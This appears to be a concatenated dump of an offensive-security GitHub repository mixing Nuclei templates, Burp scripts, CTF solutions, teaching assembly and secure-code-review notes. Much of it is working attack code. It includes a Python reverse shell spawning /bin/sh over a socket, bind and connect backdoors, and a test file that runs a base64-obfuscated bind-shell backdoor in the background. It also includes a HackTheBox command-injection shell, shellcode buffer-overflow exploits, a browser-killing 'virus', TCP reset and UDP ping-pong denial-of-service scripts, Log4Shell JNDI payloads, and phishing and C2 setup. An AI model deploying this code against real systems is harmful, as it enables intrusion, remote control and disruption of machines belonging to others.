bin3xish477 6 | severity: high 7 | description: Discovers AWS access keys using regular expressions 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | matchers: 14 | - type: regex 15 | part: body 16 | regex: 17 | - "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" 23 | 24 | -------------------------------------------------------------------------------- /Burp/CustomActions/ArbitraryHeaderReflection.java: -------------------------------------------------------------------------------- 1 | public var HEADER_NAME = "evil-header-1234"; 2 | boolean[] reflectsHeader = {false}; 3 | 4 | var headers = api().http().sendRequest(requestResponse.request().withAddedHeader(HEADER_NAME, "1337-gotcha")).response().headers(); 5 | 6 | for (HttpHeader header: headers) { 7 | if (reflectsHeader[0] == true) break; 8 | if (header.name() == HEADER_NAME) { 9 | reflectsHeader[0] = true; 10 | } 11 | } 12 | 13 | if (reflectsHeader[0] == true) { 14 | logging().logToOutput(String.format("[+] the injected request header, %s, was successfully reflected in the response headers!")); 15 | } -------------------------------------------------------------------------------- /NucleiTemplates/host-header-ssrf.yaml: -------------------------------------------------------------------------------- 1 | id: host-header-ssrf 2 | 3 | info: 4 | name: Detect SSRF via HTTP Host Header 5 | author: bin3xish477 6 | severity: high 7 | description: Detects Server-side Request Forgery (SSRF) by injecting an interactsh URL into the Host header to detect for external service interactions 8 | tags: ssrf 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | headers: 15 | Host: "{{interactsh-url}}" 16 | matchers: 17 | - type: word 18 | part: interactsh_protocol 19 | words: 20 | - "dns" 21 | - "http" 22 | - "smtp" 23 | -------------------------------------------------------------------------------- /OffensiveGo/DNS/Clients/ARecordQueries/main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | 6 | "github.com/miekg/dns" 7 | ) 8 | 9 | func main() { 10 | cloudFlare := "1.1.1.1:53" 11 | var msg dns.Msg 12 | fqdn := dns.Fqdn("binexishatt.site") 13 | msg.SetQuestion(fqdn, dns.TypeA) 14 | resp, err := dns.Exchange(&msg, cloudFlare) 15 | if err != nil { 16 | panic(err) 17 | } 18 | 19 | if len(resp.Answer) < 1 { 20 | fmt.Println("No records returned...") 21 | return 22 | } 23 | 24 | fmt.Println("(A):") 25 | for _, answer := range resp.Answer { 26 | if a, ok := answer.(*dns.A); ok { 27 | fmt.Printf("\t%s\n", a.A) 28 | } 29 | } 30 | } -------------------------------------------------------------------------------- /WebAppSecurity/owasp-api-top-ten/README.md: -------------------------------------------------------------------------------- 1 | # OWASP API Security Top 10 - 2019 2 | 3 | ### Broken Object Level Authorization 4 | 5 | ### Broken User Authentication 6 | 7 | ### Excessive Data Exposure 8 | 9 | ### Lack of Resources & Rate Limiting 10 | 11 | ### Broken Function Level Authorization 12 | 13 | ### Mass Assignment 14 | 15 | ### Secure Misconfiguration 16 | 17 | ### Injection 18 | 19 | ### Improper Assets Management 20 | 21 | ### Insufficient Loggin & Monitoring 22 | 23 | ### Resources 24 | 25 | - [OWASP API Security Top Ten PDF](https://raw.githubusercontent.com/OWASP/API-Security/master/2019/en/dist/owasp-api-security-top-10.pdf) 26 | -------------------------------------------------------------------------------- /OffensiveGo/DLL/DLLInjection/main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "syscall" 5 | ) 6 | 7 | var ( 8 | kern32 = syscall.NewLazyDLL("Kernel32.dll") 9 | 10 | // imported functions from kernel32.dll 11 | openProcess = kern32.NewProc("OpenProcess") 12 | getProcAddress = kern32.NewProc("GetProcAddress") 13 | virtualAllocEx = kern32.NewProc("VirtualAllocEx") 14 | createRemoteThread = kern32.NewProc("CreateRemoteThread") 15 | writeProcessMemory = kern32.NewProc("WriteProcessMemory") 16 | resumeThread = kern32.NewProc("ResumeThread") 17 | closeHandle = kern32.NewProc("CloseHandle") 18 | ) 19 | 20 | func main() { 21 | } 22 | -------------------------------------------------------------------------------- /SLAE/TheStack/stack.nasm: -------------------------------------------------------------------------------- 1 | ; Author : Alexis Rodriguez 2 | ; Date : 06/29/2020 3 | ; File : stack.nasm 4 | ; IS ; x86 Assembly 5 | 6 | global _start 7 | 8 | section .text 9 | _start: 10 | mov eax, 0x66778899 11 | mov ebx, 0x0 12 | mov ecx, 0x0 13 | 14 | ; push and pop of r/m16 and r/m32 15 | ; register push and pop 16 | push ax 17 | pop bx 18 | 19 | push eax 20 | pop ecx 21 | 22 | ; memory push and pop 23 | push word [sample] 24 | pop ecx 25 | 26 | push dword [sample] 27 | pop edx 28 | 29 | ; exit program 30 | mov eax, 0x1 31 | mov ebx, 0x0 32 | int 0x80 33 | 34 | section .data 35 | sample: db 0xaa, 0xbb, 0xcc, 0xdd 36 | -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/CProgramming/Misc/func_ptrs.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int func_one() 4 | { 5 | printf("This is function one\n"); 6 | return 1; 7 | } 8 | 9 | int func_two() 10 | { 11 | printf("This is function one\n"); 12 | return 2; 13 | } 14 | 15 | int main() 16 | { 17 | int v; 18 | int (*func_ptr) (); 19 | 20 | func_ptr=func_one; 21 | printf("func_ptr is 0x%08x\n", func_ptr); 22 | v=func_ptr(); 23 | printf("Value returned: %d\n", v); 24 | 25 | func_ptr=func_two; 26 | printf("func_ptr is 0x%08x\n", func_ptr); 27 | v=func_ptr(); 28 | printf("Value returned: %d\n", v); 29 | return 0; 30 | } 31 | -------------------------------------------------------------------------------- /Misc/UDPPingPongAttack/ping_pong_trigger.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | """ 4 | 1. Run udp_server.py on two different computers 5 | 2. Change src and dst address in IP header to 6 | IP addresses of computer's running udp_server.py 7 | 3. Run ping_pong_trigger.py 8 | """ 9 | from scapy.all import * 10 | 11 | def trigger_ping_pong_attack(): 12 | print("[+] Triggering UDP Ping Pong Attack...") 13 | ip = IP(src='192.168.33.135', dst='192.168.33.138') 14 | udp = UDP(sport=1234, dport=1234) 15 | data = "Let's play some udp ping pong\n" 16 | pkt = ip/udp/data 17 | send(pkt, verbose=0) 18 | 19 | if __name__ == '__main__': 20 | trigger_ping_pong_attack() 21 | -------------------------------------------------------------------------------- /Misc/UDPPingPongAttack/udp_server.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from socket import socket, AF_INET, SOCK_DGRAM 4 | from time import sleep 5 | 6 | IP = "0.0.0.0" 7 | PORT = 1234 8 | 9 | def start_server(): 10 | sock = socket(AF_INET, SOCK_DGRAM) 11 | # no use of listen or accept() in udp servers 12 | # b/c udp is connectionless 13 | sock.bind((IP, PORT)) 14 | 15 | while True: 16 | data, (ip, port) = sock.recvfrom(1024) 17 | data = data.decode("utf-8") 18 | print(f"From {ip}:{port} :") 19 | print(f"Message: {data}") 20 | sleep(1) 21 | sock.sendto(b'Thank you for the message', (ip, PORT)) 22 | 23 | if __name__ == '__main__': 24 | start_server() -------------------------------------------------------------------------------- /tools.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if ! command -v go &> /dev/null 4 | then 5 | echo "[x] missing go installation..." 6 | exit 1 7 | fi 8 | 9 | tools=( 10 | "httpx" 11 | "asnmap" 12 | "subfinder" 13 | "interactsh-client" 14 | "mapcidr" 15 | "cdncheck" 16 | "tlsx" 17 | "proxify" 18 | "dnsx" 19 | ) 20 | 21 | for tool in ${tools[@]} 22 | do 23 | if [[ $tool = "interactsh-client" ]] 24 | then 25 | # interactsh-client lives as a sub tool of the interactsh repo 26 | go install -v "github.com/projectdiscovery/interactsh/cmd/${tool}@latest" 27 | else 28 | go install -v "github.com/projectdiscovery/${tool}/cmd/${tool}@latest" 29 | fi 30 | done 31 | -------------------------------------------------------------------------------- /Burp/Bambdas/filterOutImages.json: -------------------------------------------------------------------------------- 1 | { 2 | "bambda":{ 3 | "http_history_display_filter":{ 4 | "bambda":"// ignore entry if no response returned\r\nif (!requestResponse.hasResponse()) return false;\r\n\r\nHttpRequest request = requestResponse.request();\r\nString url = request.url();\r\nMatcher matcher = Pattern.compile(\"portswigger\\\\.net\").matcher(url);\r\n\r\nreturn matcher.find() &&\r\n request.hasHeader(\"cookie\") &&\r\n !request.path().matches(\".*(\\\\.(png|svg|jpg|tiff|webp|ico|woff2?))\");\r\n\r\n// FOR IN SCOPE ITEMS\r\n//return request.isInScope() &&\r\n// !request.path().matches(\".*(\\\\.(png|svg|jpg|tiff|webp|ico|woff2?))\");" 5 | } 6 | } 7 | } -------------------------------------------------------------------------------- /PyViruses/BrowserObstruction/obstruct_browsing.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | """ A very simple virus that scans a Linux system for any running browsers and terminates them """ 4 | 5 | from psutil import process_iter 6 | from os import kill, getuid, setuid 7 | from signal import SIGTERM 8 | from time import sleep 9 | 10 | if __name__ == "__main__": 11 | target_browser_executables = ('chrome', 'firefox-esr') 12 | 13 | while True: 14 | running_processes = {p.pid: p.info['name'] for p in process_iter(["pid", "name"])} 15 | for pid, p_name in running_processes.items(): 16 | if p_name in target_browser_executables: 17 | kill(pid, SIGTERM) 18 | sleep(10) 19 | -------------------------------------------------------------------------------- /Burp/Bambdas/IdentifyCachingOracles.java: -------------------------------------------------------------------------------- 1 | if (!requestResponse.hasResponse()) { 2 | return false; 3 | } 4 | 5 | var respHeaders = requestResponse.response().headers(); 6 | respHeaders.forEach(header -> { 7 | String regex = "(?i)cache-control\\s*:\\s*(?=.*\\bpublic\\b)(?=.*\\bmax-age\\s*=\\s*\\d+).*"; 8 | Pattern pattern = Pattern.compile(regex); 9 | Matcher matcher = pattern.matcher(header.toString()); 10 | if (matcher.matches()) { 11 | requestResponse.annotations().setHighlightColor(HighlightColor.MAGENTA); 12 | requestResponse.annotations().setNotes("[+] This resource is being cached! Analyse for cache deception/poisoning"); 13 | } 14 | }); 15 | 16 | return true; -------------------------------------------------------------------------------- /HackTheBox/Fortune/cmd_inject.py: -------------------------------------------------------------------------------- 1 | from requests import post 2 | from re import search, DOTALL 3 | from cmd import Cmd 4 | from sys import exit 5 | 6 | class Shell(Cmd): 7 | prompt = "> " 8 | def default(self, args): 9 | self.run_cmd(args) 10 | 11 | def run_cmd(self, cmd): 12 | if cmd.strip() == "exit": 13 | exit(1) 14 | target_url = "http://10.10.10.127/select" 15 | data_injection = {"db": f"test; {cmd}"} 16 | resp = post(target_url, data=data_injection) 17 | output = search(r"
(.*)
", resp.text, DOTALL) 18 | if output: 19 | print(output.group(1).strip('\n')) 20 | else: 21 | print("X") 22 | 23 | if __name__ == '__main__': 24 | shell = Shell() 25 | shell.cmdloop() -------------------------------------------------------------------------------- /Misc/simple_backdoor.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | ''' 4 | Name : Alexis Rodriguez 5 | Date : 2020-02-16 6 | Description : simple backdoor 7 | ''' 8 | 9 | import socket as sck 10 | import subprocess as subp 11 | import sys 12 | 13 | def initiate(): 14 | BUFFER = 4096 15 | IP, PORT = sys.argv[1], int(sys.argv[2]) 16 | with sck.socket(sck.AF_INET, sck.SOCK_STREAM) as sock: 17 | sock.connect((IP, PORT)) 18 | COMMAND = True 19 | while COMMAND: 20 | COMMAND = sock.recv(BUFFER) 21 | RESULT = exe_cmd(COMMAND) 22 | sock.send(RESULT) 23 | 24 | def exe_cmd(COMMAND): 25 | return subp.check_out(COMMAND, shell=True) 26 | -------------------------------------------------------------------------------- /CTFs/TenableCTF/RanEncryptionFixed/ref.py: -------------------------------------------------------------------------------- 1 | import random 2 | 3 | flag = "flag{not_the_flag}" 4 | seeds = [9925, 8861, 5738, 1649, 2696, 6926, 1839, 7825, 6434, 9699, 227, 7379, 9024, 817, 4022, 7129, 1096, 4149, 6147, 2966, 1027, 4350, 4272] 5 | res = [184, 161, 235, 97, 140, 111, 84, 182, 162, 135, 76, 10, 69, 246, 195, 152, 133, 88, 229, 104, 111, 22, 39] 6 | xored = [] 7 | 8 | _flag = "" 9 | for i in range(0, len(res)): 10 | random.seed(seeds[i]) 11 | rands = [] 12 | for j in range(0,4): 13 | rands.append(random.randint(0,255)) 14 | xored.append(rands[i%4]) 15 | 16 | real_flag = "" 17 | for r, x in zip(res, xored): 18 | real_flag += chr(r ^ x) 19 | print(real_flag) 20 | -------------------------------------------------------------------------------- /SecureCodeReview/container-attack-surface-minimization/README.md: -------------------------------------------------------------------------------- 1 | # Container Attack Surface Minimization 2 | 3 | The [secure-go-build-example.dockerfile](https://github.com/bin3xish477/CyberSecurity/blob/master/SecureCodeReview/container-attack-surface-minimization/secure-go-build-example.dockerfile) file implements a multi-stage Dockerfile that deploys the app in a container based on Docker's `scratch` image, which is a minimal image from which other images are built on top of - it contains no files/folders. The attack surface of the container is drastically reduced and the efforts of a threat actor whose compromised the application and has managed to gain access to the underlying container are thwarted. 4 | 5 | -------------------------------------------------------------------------------- /Phishing/Gophish/user-data.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | gophish_setup() { 4 | mkdir /opt/gophish 5 | cd /opt/gophish 6 | wget -O gophish.zip 'https://github.com/gophish/gophish/releases/download/v0.11.0/gophish-v0.11.0-linux-64bit.zip' 7 | unzip gophish.zip 8 | rm gophish.zip 9 | sed -i 's|127\.0\.0\.1|0\.0\.0\.0|g' config.json 10 | chmod +x ./gophish 11 | ./gophish & 12 | } 13 | 14 | mailhog_setup() { 15 | # Use mailhog as the sending SMTP server 16 | mkdir /opt/mailhog 17 | cd /opt/mailhog 18 | wget -O mailhog 'https://github.com/mailhog/MailHog/releases/download/v1.0.1/MailHog_linux_amd64' 19 | chmod +x ./mailhog 20 | ./mailhog & 21 | } 22 | 23 | gophish_setup 24 | mailhog_setup 25 | -------------------------------------------------------------------------------- /PhysicalPentestStuff/rubberDucky/scripts/quick-gather.txt: -------------------------------------------------------------------------------- 1 | REM -------------------------------------------------------------- 2 | REM A ducky script to quickly view important computer information. 3 | REM Must run as admin! 4 | REM -------------------------------------------------------------- 5 | GUI r 6 | DELAY 500 7 | STRING cmd 8 | DELAY 1000 9 | STRING echo Host: && whoami 10 | DELAY 500 11 | STRING echo Ipconfig data: && ipconfig /all 12 | DELAY 500 13 | STRING echo Network interface info: && netsh wlan show interface 14 | DELAY 500 15 | STRING echo C: volume details && fsutil volume diskfree c: 16 | DELAY 1000 17 | STRING echo Systeminfo && systeminfo 18 | DELAY 10000 19 | STRING tasklist 20 | REM End 21 | -------------------------------------------------------------------------------- /Misc/DFIR-Tools/colors.py: -------------------------------------------------------------------------------- 1 | from colored import fg, attr, bg 2 | 3 | # regular colors 4 | r, e, b, p, o, y, g, w, k = 196, 76, 33, 135, 208, 226, 245, 255, 0 5 | 6 | red = lambda s: "%s%s" % (fg(r), s) 7 | green = lambda s: "%s%s" % (fg(e), s) 8 | blue = lambda s: "%s%s" % (fg(b), s) 9 | purple = lambda s: "%s%s" % (fg(p), s) 10 | orange = lambda s: "%s%s" % (fg(o), s) 11 | yellow = lambda s: "%s%s" % (fg(y), s) 12 | grey = lambda s: "%s%s" % (fg(g), s) 13 | black = lambda s: "%s%s" % (fg(k), s) 14 | white = lambda s: "%s%s" % (fg(w), s) 15 | 16 | normal = lambda s: "%s%s" % (s, attr(0)) 17 | bold = lambda s: "%s%s%s" % (s, attr('bold'), attr('reset')) 18 | bkgrd = lambda s, color: "%s%s%s" % (bg(color), s, attr('reset')) -------------------------------------------------------------------------------- /Misc/python_reverse_shell.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import subprocess 3 | import os 4 | 5 | pid = os.getpid() 6 | print(pid) 7 | 8 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 9 | s.connect(("", 7777)) 10 | # overwrite the original stdin fd 11 | os.dup2(s.fileno(), 0) 12 | # overwrite the original stdout fd 13 | os.dup2(s.fileno(), 1) 14 | # overwrite the original stderr fd 15 | os.dup2(s.fileno(), 2) 16 | 17 | # by overwriting the original file descriptors 18 | # we attach stdin, stdout, and stderr to the socket connection 19 | # and then the shell that we spawn will inherit the original 20 | # sockets file descriptors 21 | p = subprocess.call(["/bin/sh", "-i"]) 22 | 23 | os.system("ls -l /proc/%s/fd" % pid) 24 | -------------------------------------------------------------------------------- /PyPersistence/PersistenceViaWindowsRegistry/simple_backdoor.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | from socket import socket, AF_INET, SOCK_STREAM 3 | from subprocess import run, PIPE 4 | from os import _exit 5 | 6 | # pip install -U nuitka 7 | # nuitka3 simple_backdoor.py --standalone 8 | # or 9 | # pyinstaller --onefile --noconsole simple_backdoor.py 10 | 11 | def main(): 12 | with socket(AF_INET, SOCK_STREAM) as soc: 13 | soc.bind(("0.0.0.0", 2525)) 14 | soc.listen(5) 15 | conn, _ = soc.accept() 16 | while True: 17 | cmd = conn.recv(1024).decode("utf-8").strip() 18 | cmd_output = run(cmd.split(), stdout=PIPE, stderr=PIPE) 19 | if cmd_output.returncode == 0: 20 | conn.send(bytes(cmd_output.stdout, "utf-8")) 21 | main() -------------------------------------------------------------------------------- /OffensiveGo/SliverStager/go.sum: -------------------------------------------------------------------------------- 1 | github.com/Binject/debug v0.0.0-20210312092933-6277045c2fdf h1:Cx4YJvjPZD91xiffqJOq8l3j1YKcvx3+8duqq7DX9gY= 2 | github.com/Binject/debug v0.0.0-20210312092933-6277045c2fdf/go.mod h1:QzgxDLY/qdKlvnbnb65eqTedhvQPbaSP2NqIbcuKvsQ= 3 | github.com/Binject/go-donut v0.0.0-20210701074227-67a31e2d883e h1:ytVmxGQuS7ELO/WpvH6iuY1hVcJ6iOTw3VLOOIFlo8o= 4 | github.com/Binject/go-donut v0.0.0-20210701074227-67a31e2d883e/go.mod h1:dc3mUnr4KTKcFKVq7BVbHGF0xAHrIyooQ+VTO7/bIZw= 5 | github.com/akamensky/argparse v1.3.0/go.mod h1:S5kwC7IuDcEr5VeXtGPRVZ5o/FdhcMlQz4IZQuw64xA= 6 | github.com/google/uuid v1.2.0 h1:qJYtXnJRWmpe7m/3XlyhrsLrEURqHRM2kxzoxXqyUDs= 7 | github.com/google/uuid v1.2.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= 8 | -------------------------------------------------------------------------------- /DockerStuff/C2Deployments/nginx/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Welcome to nginx! 5 | 10 | 11 | 12 |

Welcome to nginx!

13 |

If you see this page, the nginx web server is successfully installed and 14 | working. Further configuration is required.

15 | 16 |

For online documentation and support please refer to 17 | nginx.org.
18 | Commercial support is available at 19 | nginx.com.

20 | 21 |

Thank you for using nginx.

22 | 23 | 24 | -------------------------------------------------------------------------------- /PyViruses/PyBackdoorInjection/test/test1.py: -------------------------------------------------------------------------------- 1 | 2 | 3 | from subprocess import run 4 | run("""python3 -c "from binascii import a2b_base64;exec(a2b_base64('ZnJvbSBzb2NrZXQgaW1wb3J0IHNvY2tldCwgQUZfSU5FVCwgU09DS19TVFJFQU0KZnJvbSBzdWJwcm9jZXNzIGltcG9ydCBydW4sIFBJUEUKZGVmIHNlcnZlKCk6Cgl3aXRoIHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSkgYXMgc29jOgoJCXNvYy5iaW5kKCgiMC4wLjAuMCIsIDEwMjUpKQoJCXNvYy5saXN0ZW4oNSkKCQl3aGlsZSBUcnVlOgoJCQljb25uLCBfID0gc29jLmFjY2VwdCgpCgkJCXdoaWxlIFRydWU6CgkJCQljbWQgPSBjb25uLnJlY3YoMTAyNCkuZGVjb2RlKCJ1dGYtOCIpLnN0cmlwKCkKCQkJCWNtZF9vdXRwdXQgPSBydW4oY21kLnNwbGl0KCksIHN0ZG91dD1QSVBFLCBzdGRlcnI9UElQRSkKCQkJCWlmIGNtZF9vdXRwdXQucmV0dXJuY29kZSA9PSAwOgoJCQkJCWNvbm4uc2VuZChieXRlcyhjbWRfb3V0cHV0LnN0ZG91dCkpCgkJCQllbHNlOiBjb250aW51ZQpzZXJ2ZSgp'))" &""",shell=True) -------------------------------------------------------------------------------- /SecureCodeReview/ruby/command-injection/README.md: -------------------------------------------------------------------------------- 1 | # Ruby Command Injection Functions 2 | 3 | The following Ruby functions can be used to execute system commands and should be avoided if possible: 4 | 5 | ```ruby 6 | eval("ruby code here") 7 | system("os command here") 8 | `ls -al /` # (backticks contain os command) 9 | exec("os command here") 10 | spawn("os command here") 11 | open("| os command here") 12 | Process.exec("os command here") 13 | Process.spawn("os command here") 14 | IO.binread("| os command here") 15 | IO.binwrite("| os command here", "foo") 16 | IO.foreach("| os command here") {} 17 | IO.popen("os command here") 18 | IO.read("| os command here") 19 | IO.readlines("| os command here") 20 | IO.write("| os command here", "foo") 21 | ``` 22 | -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/Exploitation/exploit_notesearch_env.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | char shellcode[]= 7 | "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68" 8 | "\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89" 9 | "\xe1\xcd\x80"; 10 | 11 | int main(int argc, char *argv[]) 12 | { 13 | char *env[2]={shellcode, 0}; 14 | unsigned int i, ret; 15 | char *buffer=(char *)malloc(160); 16 | 17 | ret=0xbffffffa-(sizeof(shellcode)-1)-strlen("./notesearch"); 18 | for(i=0; i<160; i+=4) 19 | *((unsigned int *)(buffer+i))=ret; 20 | 21 | execle("./notesearch", "notesearch", buffer, 0, env); 22 | free(buffer); 23 | return 0; 24 | } 25 | -------------------------------------------------------------------------------- /SecureCodeReview/code-samples/sample.2.java: -------------------------------------------------------------------------------- 1 | /* Can you spot the vulnerability?? */ 2 | 3 | public String addNewSession() { 4 | this.lock.lock() 5 | final byte[] bytes = new byte[16]; 6 | boolean isJSessionIdFoundInCache = null; 7 | String newJSessionId = null; 8 | 9 | try { 10 | do { 11 | PBPSessionManager.random.nextBytes(bytes); 12 | newJSessionId = Hex.encodeHexString(bytes); 13 | isJSessionIdFoundInCache = (this.jsessionCache.get(newJSessionId) != null); 14 | } while (isJSessionIdFoundInCache); 15 | 16 | final JSession jSession = new JSession(newJSessionId); 17 | this.jsessionCache.put(newJSessionId, jSession); 18 | return newJSessionId; 19 | 20 | } finally { 21 | this.lock.unlock() 22 | } 23 | } 24 | 25 | -------------------------------------------------------------------------------- /SLAE/Logical/logical.nasm: -------------------------------------------------------------------------------- 1 | ; Author : Alexis Rodriguez 2 | ; Date : 06/30/2020 3 | ; File : logical.nasm 4 | ; IS : x86 Assembly 5 | 6 | global _start 7 | 8 | section .text 9 | _start: 10 | ; AND 11 | mov al, 0x10 12 | and al, 0x01 13 | 14 | and byte [var1], 0xaa 15 | and word [var2], 0x1122 16 | 17 | ; OR 18 | mov al, 0x10 19 | or al, 0x01 20 | 21 | or byte [var1], 0xaa 22 | 23 | mov eax, 0x0 24 | or eax, 0x0 25 | 26 | ; XOR 27 | xor dword [var3], 0x11223344 28 | xor dword [var3], 0x11223344 29 | 30 | ; NOT 31 | mov eax, 0xFFFFFFFF 32 | not eax 33 | not eax 34 | 35 | ; exit program 36 | mov eax, 0x1 37 | mov ebx, 0x0 38 | int 0x80 39 | 40 | section .data 41 | var1: db 0xaa 42 | var2: dw 0xbbcc 43 | var3: dd 0x11223344 44 | 45 | -------------------------------------------------------------------------------- /Cryptography/MoreThanSecrecy/cracking_caesar.py: -------------------------------------------------------------------------------- 1 | from string import ascii_lowercase as alphabet 2 | from sys import argv, exit 3 | 4 | def crack_caesar(cipher): 5 | plain_text = "" 6 | for n in range(1, 27): 7 | plain_text = "" 8 | for char in cipher: 9 | if char in alphabet: 10 | plain_text += alphabet[alphabet.index(char)-n%len(alphabet)] 11 | else: 12 | plain_text += char 13 | yield plain_text 14 | 15 | if __name__ == "__main__": 16 | if len(argv) < 2: 17 | print(f"usage: {__file__} ") 18 | exit(1) 19 | 20 | cipher = argv[1].lower() 21 | decoded_strings = crack_caesar(cipher) 22 | for string in decoded_strings: 23 | print(string) 24 | -------------------------------------------------------------------------------- /Misc/BufferOverflow/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | def create_exploit(return_addr): 4 | shellcode = ( 5 | "\x31\xc0" 6 | "\x50" 7 | "\x68""//sh" 8 | "\x68""/bin/" 9 | "\x89\xe3" 10 | "\x50" 11 | "\x53" 12 | "\x89\xe1" 13 | "\x31\xd2" 14 | "\xb0\x0b" 15 | "\xcd\x80" 16 | ).encode("latin-1") 17 | 18 | payload = bytearray(0x90 for i in range(300)) 19 | start = 300 - len(shellcode) 20 | payload[start:] = shellcode 21 | payload[112:116] = (return_addr).to_bytes(4, byteorder="little") 22 | return payload 23 | 24 | if __name__ == "__main__": 25 | payload = create_exploit(0xbfff3a98) 26 | with open("exploit", "wb") as exploit: 27 | exploit.write(payload) 28 | -------------------------------------------------------------------------------- /Misc/TCPAttacks/ResetAttack/reset_attack.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from scapy.all import * 4 | 5 | def reset_attack(pkt): 6 | """ Sending a packet with the RESET bit set on behalf 7 | of the connection made between a client and a server will 8 | cause the connection to terminate. This creates a denial-of-service 9 | scenario because for connection established a client and a server 10 | will be terminated immediately after any party receives a RESET packet. 11 | """ 12 | ip = IP(src="machine_a_ip", dst="machine_b_ip") 13 | tcp = TCP(sport="server_port", dport=pkt[TCP].sport, 14 | flags="R", seq=pkt[TCP].ack) 15 | 16 | pkt = ip/tcp 17 | send(pkt, verbose=0) 18 | 19 | if __name__ == "__main__": 20 | sniff(prn=reset_attack) 21 | -------------------------------------------------------------------------------- /Misc/Phishing/Pyphish/pyphish/pages/menu.py: -------------------------------------------------------------------------------- 1 | from gophish.models import Page 2 | from gophish.api.pages import API 3 | from colored import fg, attr 4 | from random import randint 5 | 6 | 7 | class PagesMenu: 8 | def __init__(self, client=None): 9 | self.pages_menu_color = randint(1, 220) 10 | self.client = client 11 | 12 | def prompt(self): 13 | while ( 14 | i := input( 15 | "(%sPages%s) %s " %(fg(self.pages_menu_color), attr(0), "%") 16 | ).strip().lower()): 17 | if i == "back": 18 | return 19 | else: 20 | print( 21 | "<[%s-%s]> Invalid option ..." 22 | %(fg(self.pages_menu_color),attr(0)) 23 | ) 24 | 25 | -------------------------------------------------------------------------------- /Misc/gobust.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | #################################################### 4 | Quick script to run gobuster against files with urls 5 | using the common options I use with gobuster 6 | #################################################### 7 | 8 | URL_FILE=$1 9 | WORDLIST=$2 10 | THREADS=$3 11 | ERROR_CODES=$4 12 | 13 | for url in $(cat $URL_FILE); 14 | do 15 | 16 | echo "==> $url" 17 | 18 | if [[ -z $ERROR_CODES ]]; 19 | then 20 | ERROR_CODES=404 21 | fi 22 | 23 | if [[ -z $THREADS ]]; 24 | then 25 | THREADS=15 26 | fi 27 | 28 | IP=$(echo $url | egrep -o '([0-9]{1,3}\.){3}[0-9]{1,3}') 29 | 30 | gobuster dir -u $url -w $WORDLIST -q -k -r -t $THREADS -b $ERROR_CODES --timeout 10s --no-error --useragent "$GOOGLEBOT" | tee $IP-gobuster.stdout 31 | done 32 | -------------------------------------------------------------------------------- /NucleiTemplates/log4shell-detect.yaml: -------------------------------------------------------------------------------- 1 | id: log4shell-detect 2 | 3 | info: 4 | name: Detect Log4Shell Vulnerable Web Apps 5 | author: bin3xish477 6 | severity: high 7 | description: This scripts inject JNDI payloads into several HTTP headers and attempts to detect OOB interactions with interactsh 8 | reference: 9 | - "https://github.com/Cybereason/Logout4Shell" 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | headers: 16 | User-Agent: "${jndi:ldap://{{interactsh-url}}/x}" 17 | Server-IP: "${jndi:ldap://{{interactsh-url}}/x}" 18 | X-Forwarding: "${jndi:ldap://{{interactsh-url}}/x}" 19 | matchers: 20 | - type: word 21 | part: interactsh_protocol 22 | words: 23 | - "dns" 24 | - "http" 25 | -------------------------------------------------------------------------------- /WebAppSecurity/ci-cd/README.md: -------------------------------------------------------------------------------- 1 | # CI/CD 2 | 3 | ### What is a CI/CD Pipeline? 4 | 5 | ``` 6 | A continuous integration and continuous deployment (CI/CD) pipeline is a series of steps that must be performed in order to deliver a new version of software. CI/CD pipelines are a practice focused on improving software delivery throughout the software development life cycle via automation. 7 | 8 | By automating CI/CD throughout development, testing, production, and monitoring phases of the software development lifecycle, organizations are able to develop higher quality code, faster. Although it’s possible to manually execute each of the steps of a CI/CD pipeline, the true value of CI/CD pipelines is realized through automation. 9 | ``` 10 | 11 | Source: [Red Hat](https://www.redhat.com/en/topics/devops/what-cicd-pipeline) 12 | -------------------------------------------------------------------------------- /DockerStuff/C2Deployments/silent_trinity.dockerfile: -------------------------------------------------------------------------------- 1 | ############################# 2 | # build with: 3 | # docker build -t silent --build-arg TS_PASS=YourSecurePassPhrase -f ./silent_trinity.dockerfile . 4 | # run with: 5 | # docker run --name silent -d -v /opt/st:/root/st/data -p 5000:5000 silent 6 | ############################## 7 | # connect to server from Kali with: 8 | # python3 st client wss://sername>:@:5000 9 | ############################## 10 | 11 | FROM python:3.7.11-slim-stretch 12 | ARG TS_PASS 13 | ENV TS_PASS=$TS_PASS 14 | RUN apt update && apt install -y git make gcc 15 | 